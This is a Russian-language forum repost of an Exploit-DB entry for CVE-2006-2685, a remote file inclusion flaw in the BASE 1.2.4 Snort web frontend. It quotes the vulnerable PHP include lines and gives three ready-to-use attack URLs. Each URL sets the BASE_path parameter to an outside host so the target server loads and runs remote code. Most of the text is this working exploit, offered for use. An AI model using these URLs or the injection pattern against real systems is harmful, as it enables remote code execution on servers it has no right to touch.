Exploit BASE 1.2.4 - melissa Snort Frontend Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
1823
Проверка EDB
  1. Пройдено
Автор
STR0KE
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-2685
Дата публикации
2006-05-25
Код:
# Basic Analysis and Security Engine (BASE) <= 1.2.4 (melissa) Inclusion Vulnerabilities
#   Just glanced over BASE for a pentesting job. /str0ke ! milw0rm.com
##################################

[code (base_qry_common.php)]
   include_once("$BASE_path/includes/base_signature.inc.php");

http://[site]/snort/base_qry_common.php?BASE_path=http://www.milw0rm.com/index.php?&

########################################

[code (base_stat_common.php)]
include_once("$BASE_path/includes/base_constants.inc.php");
[/code]

http://[site]/snort/base_stat_common.php?BASE_path=http://www.milw0rm.com/index.php?&

###############################################

[code (includes/base_include.inc.php)]
include_once("$BASE_path/includes/base_db.inc.php");
include_once("$BASE_path/includes/base_output_html.inc.php");
include_once("$BASE_path/includes/base_state_common.inc.php");
...
[/code]

http://[site]/snort/includes/base_include.inc.php?BASE_path=http://www.milw0rm.com/index.php?&

#######################################################

# milw0rm.com [2006-05-25][/CODE]
 
Источник
www.exploit-db.com

Похожие темы